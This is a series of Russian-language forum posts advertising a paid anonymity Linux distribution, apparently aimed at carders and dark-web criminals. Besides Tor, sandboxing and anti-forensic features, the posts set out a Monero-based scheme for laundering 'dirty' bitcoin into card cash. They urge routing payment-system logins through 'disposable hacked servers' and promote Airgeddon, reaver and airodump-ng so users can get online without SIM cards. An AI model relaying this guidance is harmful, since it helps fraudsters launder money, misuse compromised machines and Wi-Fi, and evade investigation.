    - Тоr трафик замаскирован протоколом obfs4 (так же поддерживается obfs3 и scramblesuit, всего в дистрибутиве предустановлено 23 моста, которые можно менять когда и как угодно). Поскольку весь трафик машины перенаправляется через Tor - DPI (глубокий анализ пакетов) анализ провести невозможно - все данные выглядят как случайный набор нолей и единиц.

    - Каждая цепь тора изолирована и два приложения по одной цепи никогда не запускаются. Это усложняет идентификацю, разрывая связь между разными приложениями или вкладками браузера.

    - Отключена отправка TCP TIMESTAMPS - в которых содержится такой параметр как аптайм (время неприрывной работы машины). Если он не отключен - то возможно доказать что пакеты с разных выходных нод принадлежат одной машине - так как аптайм это параметр уникальный - нет двух машин запущееных одновременно с точностью до тысячных долей секунды. При таких раскладах изоляция цепей тора становится гораздо менее эффективной.

    - Установлен пакет для очистки метаданных, позволяющий проверять/удалять критичные метаданные в изображениях. Так же установлен пакет одновременного переименования больших количеств файлов (поскольку важно не только удалять метаданные из фотографий, но и изменять их названия, так как по умолчанию фотокамеры создают файлы с порядковыми номерами, что тоже является ценной информацией при криминалистическом анализе).

    - Помимо Bitcoin кошелька Electrum (который кстати сконфигурирован работать через Tor, а при выборе монет выбирать наименее прозрачные - опция coin_chooser: Privacy,) установлен и настроен кошелек Monero. Он на порядок сложнее в мониторинге транзакций, а в ближайшем будущем станет еще безопаснее, посколько совсем скоро состоится первый релиз проекта под названием KOVRI - i2p роутер от разработчиков Monero. Так что скоро все монетки будут передаваться через настоящий Dark Net - i2p. Пока же кошелек, как впрочим и всё в системе работает через Tor Network. Монеро дает возможность усложнять анализ финансовых цепочек, выводя деньги по схеме:

    bitcoin-грязь - (биткойн обменника 1 - монеро обменника 1) x монеро грязь X монеро чистый x (монеро обменника 2 - карта обменника 2) - карта

    Отрезки, которые разрывают связь грязных денег с чистыми выделены цветом. Особеено важна зеленая транзакция между двумя своими кошельками, которая проходит без участия третьих лиц.


    ^ монеро, как и все программы в системе конектиться к ноде через тор

    - В платежные системы можно заходить, подключая еще один узел после узлов тора - SSH сервер с чистым IP адресом. Причем делать это можно и НУЖНО полностью анонимно - используя одноразовые взломанные сервера. Арендовать IP у какого то сервиса опасная ошибка - поскольку этот адрес стоит в конце цепи анонимизации, он общеизвестен и есть в логах всяческих QIWI и т.п. А значит они с радостью выдадут его по запросу.

    Аналогично поступят и те, у кого вы арендовали этот IP адрес - может быть и не срадостью, но выбора у них не будет, отвечать за ваши косяки они не станут и займут позицию свидетеля. А поскольку у них будут как минимум данные ваших кошельков, а если вы были совсем наивны и пользовались их услугами перед цепью тора - например покупали VPN - то тогда у вас очень плохая позиция будет. Проще говоря вам пиздец. И никакой левый модем с левой симкой вас уже не спасут, напротив, они лишь облегчат ваш поиск - не так много людей в городе сидит с модема с 12 дня до 9 вечера без выходных, пользуясь левой симкой, маскируя при этом весь трафик дорогим VPN сервисом. Останется лишь сравнить тайминги таких модемов с активностью на форуме и в мессенджерах - и станет понятно кто из них кто. Подробнее о VPN можно почитать тут:

    Ссылка доступна только зарегистрированным пользователям

    Безопасность:

    - Весь трафик машины запущен через Tor. Причем маршрутизация начинается задолго до загрузки системы, тем самым исключая любые утечки даже через сервисные программы:


    ^ сервисный запрос от whois по порту 43 идет через тор, хотя он запущен не через torsocks или proxychains.

    - Установлены пакеты для самостоятельной проверки утечек трафика - анализаторы трафика. Обучение работе с ними входит в стоимость.

    - Установлены пакеты для самостоятельной проверки системы на вирусы, трояны, руткиты и скрытые процессы.

    - Установлен комплекс проверки целостности ключевых модулей и систем, который при первом запуске делает слепок чистой системы, и в дальнейшем проверяет ее структуру. Даже если зловредная программа уничтожится после выполнения задания, например установки бэкдора, и детекторы из пункта выше не смогут ее обнаружить, комплекс проверки целостности сообщит о том, что важные параметры были изменены, так как он помнит исходное состояние системы.

    - Установлен комплекс охраны USB портов. После запуска системы он начинает патрулировать порты каждые полсекунды, сравнивая конфигурацию портов с той, что была на старте. Если она вдруг поменяется (что то вытащить из порта, например флешку или мышку или напротив вставить) то комплекс отреагирует затиранием оперативной памяти и экстренным выключением машины. Это защищает систему от атак BadUsb, а так же от использования других средств для проведения криминалистического анализа.

    Для работы в RAM режиме (что бы можно было извлечь флешку после запуска и освободить порт) я сделал запуск комплекса через диалог - и пока вы не нажали Yes можно извлеч флешку с системой и вставить вместо нее что то другое, а потом уже запустить комплекс охраны USB.

    - При работе в Persistence режиме (когда система сохраняет все изменения) на носителе система занимает 1.3 гигабайта. Все остальное место будет занято зашифрованным разделом, в котором и будут храниться файлы конфигурации с изменениями и ваши файлы. Этот раздел можно уничтожить специальным паролем, причем ввести его можно как на запуске, так и в процессе работы, изнутри системы.

    - Главный плюс моей системы - возможность работать без симок и модема, исключив утечку каких бы то ни было сетевых идентификаторов. При этом не нужно быть хакером или программистом - комплекс Airgeddon адаптирован мной для неподготовленного оператора - он русифициров
  14. WarTech

    WarTech Member

    Сообщения:
    572
    Симпатии:
    0
    НОВОСТИ:

    В связи с выходом торбраузера 8.0 пришлось форсировать работы над релизом 2.5, так что он появился на 2 недели раньше запланированного срока. Что улучшилось:

    1. В систему вернулся Pidgin. Теперь на выбор есть два клиента для xmpp протокола Pidgin и CoyIM.

    2. В системе наконец то смонтирована система анонимного обмена файлами - Onion Share. Давно хотел ее интегрировать, но ее нет в репозиториях уже, пришлось самому собрать deb пакет из исходников. Кратко суть:

    Обмениваться файлами через хостинги рискованно, так как неизвестно что там с ними происходит. Даже если файлы шифрованы, то остается сам файт передачи через третью сторону. Чем это опасно? Ну например вот такой расклад: петя послал васе файл в пятницу вечером. Файл -порнухаспидарасами.rar. Этот факт остался в логах хостинга. К пете пришли с обыском дяди и нашли этот файл. Дяди так же подозревали что вася с петей в одной банде. Пришли к васе и нашли у него этот же файл. Но вася возразил им, мол да это просто совпадение. Дяди же посмотрели на дату создания файла на компе у васи, потом посмотрели логи с хостинга, и обнаружили что дата создания пуля в пулю совпадает с датой скачивания с хостинга файла, который залил петя. После чего сказале васе пиздишь, побили его и отвезли в изолятор временного содержания сидеть.

    Онионшара же - как и горячо любимый мною рикошет - тема крайне децентрализованная. А посему об обмене файлов не знает никто, кроме участников обмена. Так же как и в рикошете приложение создает хидден сервис - виртуальный анонимный одноразовый хостинг, после чего генерирует ссылку на скачивание файла, и стройт входящиую цепь из трех узлов

    отправитель - нода1 - нода2 - нода2 -<

    После того как адресат получит ссылку на хидден сервис он пихает ее в браузер и коннектится к в ходной цепи хидден сервиса через свои три узла:

    отправитель - нода1 - нода2 - нода2 -< <- нода3 - нода2 - нода1 - получатель

    Тема полностью анонимная и много лет уже входит в состав Тейлс. В общем грех было ее не заюзать. Для удобства я добавил в меню проводника опцию Отправить через онионшару.

    Так же в меню правой кнопки добавлена опция проверки фотокарточек на предмет EXIF.


    Важно! Что бы не лопнула башка от прочтения текста ниже неплохо будет понять что тор это тор. И называть тором торбраузер, торнетворк или торпроджект неправильно.

    3. Торбраузер 7.5.6 Tails заменен на прототип браузера WarFox. Поскольку сроки пришлось сдвинуть, пока WarFox это лишь кастомизированный Торбраузер из которого я удалил адд-он Tor Launcher. Удалили потому, что во первых при стоковой настройке цепи в браузере получались длинной в 6 узлов - сначала шел коннект через 3 ноды основного тора до гуард ноды тора торбраузера - и от этой гуардноды торбраузер еще дополнительно делал свою цепь в три узла:

    (основной тор - нода1 - нода2 - нода3) (+ тор торбраузера - нода4 - нода5 - нода6)

    На первый взгляд может показаться, что 6 узлов лучше чем три. Но это не так. Анонимности это не добавляет, а даже напротив, снижает ее. Плюс это сильно сказывается на скорости.

    Ну и главная причина, почему из торбраузера я вырезал встроенный тор - торбраузер был неупровляемым. В крайме есть функция выбора страны для выходной ноды, после использования которой все приложения будут иметь айпи выбранной страны. Так и было, за исключением тор браузера. Например если была выбрана немеция:

    джабер - нода1 - нода2 - нода3 (немеция)
    телега - нода1 - нода2 - нода3 (немеция)
    торбраузер - нода1 - нода2 - нода3 (немеция) - нода4 - нода5 - нода6 (как попало)

    В итоге поставить немецию в торбраузере не было никакой возможности. Теперь же все по уму:

    джабер - нода1 - нода2 - нода3 (немеция)
    телега - нода1 - нода2 - нода3 (немеция)
    warfox браузер - нода1 - нода2 - нода3 (немеция)

    Плюс к этому торбраузером не получалось пользоваться в паре с connect-proxy. Теперь же в нем можно прописывать вместо порта SOCKS5 не 9050, а кастомный порт SSH PROXY сервера, чтобы прикрывать выходную ноду читым IP адресом.

    Так же в отличии от оригинального торбраузера прототип WarFox работает в песочнице, подробнее о них ниже:

    4. FIREJAIL - контейнерные изоляторы приложений.

    В операционных системах семейства linux есть такая штука как userspace - виртуальное изолированное пространство, как бы миниатюрная операционная система внутри основной. Принцип тот же самый что и у виртуальных машин - это тоже относится к виртуализации. Только в данном случае миниатюрная виртуальная машинка создается для приложения, а не для целой операционной системы. Что это дает? Это дает возможность переписать правила основной операционной системы для отдельного приложения. Например если приложение запускается в основной системе оно имеет возможность смотреть содержимое рут каталога, запускать программы из любых папок, подключаться к интернету через сетевые карты, это же приложение запущенное в изоляционном контейнере не будет иметь доступа ни к рут каталогу, ни к интернету, а так же получит запрет на запуск программ. Все что оно будет видеть - это минимально необходимый для его функционирования набор файлов конфигурации.

    Таким образом я защитил систему не только от атак через известные уязвимости в программах и процессах, но и от так называемых атак нулевого дня - это вид атак при которых эксплуатируются только что обнаруженные уязвимости. Например такая атака была в конце прошлого года, когда обнаружилась дыра в торбраузере, причем разработчики об этой дыре узнали уже по факту, от самих атакованных. В данном случае даже в этой ситуации операторы WarTech CR1ME не понесли бы каких то потерь, потому что все сетевые приложения находяться в изоляционных контейнерах, и не важно через какие уязвимости будет атака - все равно за границы виртуального контейнера атакующий выйти не сможет.

    В версии 2.5 в контейнеры заперты:

    WarFox
    Telegram
    Pidgin
    Remmina
    Onion Share
    Electrum
    VIPole
    Thunderbird
    Filezilla

    Keepassx
    Engrampa
    Bleachbit
    GIMP
    Vlc
  15. WarTech

    WarTech Member

    Сообщения:
    572
    Симпатии:
    0
    Всем привет!

    Сегодня день необычный - ровно год назад 14 сентября я открыл свою первую ветку, так что можно подвести итоги первого года работы:

    За первый год удалось прочно закрепиться на трех форумах - один из крупнейших русскоговорящих дарк-форумов в торе, крупнейшая на территории бывшего СНГ RC площадка, и популярный carding форум.
    За первый год WarTech CR1ME Linux прошел путь от примитивного, зачаточного состояния в виде образа флешки с чужим линуксом, пускай и сильно видоизмененным, до полноценного, взрослого дистрибутива, который уже давно перешагнул по качеству исполнения, реализованным идеям и авторским решениям гражданские проекты типа BunsenLabs, Xebian и т.п. но пока еще уступает таким монстрам как T.A.I.L.S. или Kali Linux.

    Уступает в первую очередь из за того, что над этими проектами работает коммьюнити, я же снова вынужден работать один в данный момент. Вторая причина - банальное отсутсвие у меня опыта в области программирования. Не могу сказать что шелл скрипты или питон очень сложные - прочитав код я многое интуитивно понимаю. Но чтобы что то сделать уходит очень много времени, так как нужно читать хелп и ман, пробовать, ошибаться.

    В общем в этом плане опыта реально нехватает, потому в CR1ME пока еще многое реализовано на мануалах от создателей T.A.I.L.S, хотя есть уже и свои наработки. Например я давно уже использую авторский скрипт, которые поднимает индекс прочности системы до номинальных 80-85 баллов полностью в автоматическом режиме - нужно лишь его запустить и покурить 10 минут, после чего система с базовых 54-57 пунктов станет 80+, так как скрипт закроет все основные уязвимые места и исправит гражданские настройки системы на боевые.

    Так же в процессе создание глобального центра управления системой - модуль WARTECH. На данный момент он уже умеет следующее:
    • wartech ip - проверка IP адреса
    • wartech change - смена IP с выбором страны
    • wartech mac - смена MAC адресов всех сетевых карт на лету - при этом не прерывается работа таких программ как reaver или airodump-ng
    • wartech usb - запуск модуля защиты USB портов
    • wartech forceoff - вайп оперативной памяти с последующем выключением
    • wartech erase - уничтожение ячеек с ключами шифрования
    Совсем скоро будет добавлена функция wartech write sdX - где X это буква флешки. такой командой можно будет создавать зашифрованный persistence раздел в автоматическом режиме, вводя лишь пароль которым флешка будет открываться.

    Символично что вчера вечером я впервые удачно заварил образ с инсталлятором - примерно таким через который ставиться так же убунта на жесткий диск. То есть теперь крайм можно полноценно поставить на жесткий диск, все по взрослому - с выбором языка, настройкой разметки, созданием учетки юзера и т.п. Только после установки вас встретить не инфернальный лилово - оранжевый мультипликационный ужас - а суровый расовый германский дебиан в сером камуфляже вермахта фельдграу.

    В честь этого события я готов сделать 50% скидку всем, кто совершит покупку в течение сегодняшнего дня. Напомню, что актуальная, проверенная версия системы на данный момент - 2.5. Подробее о ней выше ^

    п.с. начались работы по созданию браузера WarFox и WarTech CR1ME Linux серии 3.Х - версии с debian-installer которую можно будет устанавливать полной установкой.

    п.п.с: фон плимута при запросе пароля от флешки (плимут это модуль которые вместо титров при загрузке показывает красивости, например тут по орбитам вокруг спирали дебиана летают атомы):

Поделиться этой страницей